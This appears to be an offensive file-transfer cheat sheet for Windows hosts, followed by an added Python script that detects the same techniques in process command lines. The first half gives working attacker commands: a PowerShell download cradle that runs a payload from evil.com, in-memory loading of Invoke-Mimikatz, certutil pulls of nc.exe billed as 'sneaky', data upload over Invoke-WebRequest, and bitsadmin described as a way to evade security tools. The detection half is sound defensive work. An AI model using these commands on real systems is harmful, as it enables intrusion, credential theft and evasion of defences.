File Transfer

curl
curl http://ip/file -o <output>
wget
wget http://ip/file -OutFile <output>
Fileless Execution
Invoke-Expression to download and execute
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

In-memory execution

Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')
certutil
First, start a Python web server
python3 -m http.server 443
Then (the URL must name the port the server listens on)
certutil.exe -f -urlcache -split http://<IP>:443/<file>
You can specify the location and rename the file
certutil -urlcache -split -f http://10.10.14.23:8000/ms15-051.exe C:\inetpub\drupal-7.54\ms15-051.exe
Sneaky Version
certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe
Invoke-WebRequest
Download a file
IWR -uri http://<ip>/<file> -OutFile <file_name>
Uses Chrome User Agent
Invoke-WebRequest http://<ip>/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"
Upload a file ($b64 holds the Base64-encoded file contents)
Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64
Impacket
First, create an SMB share
impacket-smbserver <share_name> <file_path> -smb2support
Then, copy the files
copy \\<ip>\<share_name>\<file> <destination_path>

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')

Bitsadmin

Download files stealthily and evade detection, as bitsadmin is a native tool and might be overlooked by some security solutions.
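
On the detection side, every command on this page leaves a process-creation record whose command line can be matched, native tool or not. The following is an added example, not part of the original page: it classifies command lines against the transfer techniques listed above. The rule names and sample records are constructed, and the bitsadmin /transfer and /addfile switches are assumed from the tool's documented usage since the page shows no bitsadmin command.

```python
import re

# Hypothetical rule names; patterns cover the transfer commands listed on this page.
RULES = {
    "certutil_download": re.compile(r"\bcertutil(\.exe)?\b.*[-/](urlcache|verifyctl)\b", re.I),
    "ps_download_cradle": re.compile(r"\b(iex|invoke-expression)\b.*\bdownloadstring\b", re.I),
    "ps_webclient_file": re.compile(r"net\.webclient\b.*\bdownloadfile\b", re.I),
    "ps_web_request": re.compile(r"\b(iwr|invoke-webrequest)\b.*https?://", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b", re.I),
    "smb_unc_copy": re.compile(r"\bcopy\s+\\\\[^\\\s]+\\", re.I),
}

def normalize(cmdline):
    # Drop cmd.exe carets, PowerShell backticks and quotes used to split keywords.
    return re.sub(r"[\^`\"']", "", cmdline)

def classify(cmdline):
    """Return the sorted names of all rules that match one process command line."""
    text = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def hunt(events):
    """Return (host, rules, cmdline) for every event matching at least one rule."""
    hits = []
    for host, cmdline in events:
        rules = classify(cmdline)
        if rules:
            hits.append((host, rules, cmdline))
    return hits

# Constructed process-creation records (host, command line); 192.0.2.0/24 is documentation space.
SAMPLE_EVENTS = [
    ("ws01", r"certutil.exe -urlcache -split -f http://192.0.2.10:8000/a.exe C:\Temp\a.exe"),
    ("ws01", r"cer^tutil.exe -verifyctl -split -f http://192.0.2.10/nc.exe"),
    ("ws02", "powershell.exe -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\""),
    ("ws02", r"powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/f', 'f.bin')"),
    ("ws03", r"powershell.exe -c I`WR -uri http://192.0.2.10/f -OutFile f.bin"),
    ("ws03", r"bitsadmin /transfer job1 http://192.0.2.10/f C:\Temp\f.bin"),
    ("ws04", r"cmd.exe /c copy \\192.0.2.10\share\f.exe C:\Temp\f.exe"),
    ("ws05", r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"),  # benign use, must not match
]

if __name__ == "__main__":
    for host, rules, cmdline in hunt(SAMPLE_EVENTS):
        print(host, ",".join(rules), "|", cmdline)
```

Feed it the command-line field from process-creation logging (for example Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) and treat matches as hunting leads to triage against parent process and destination host.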
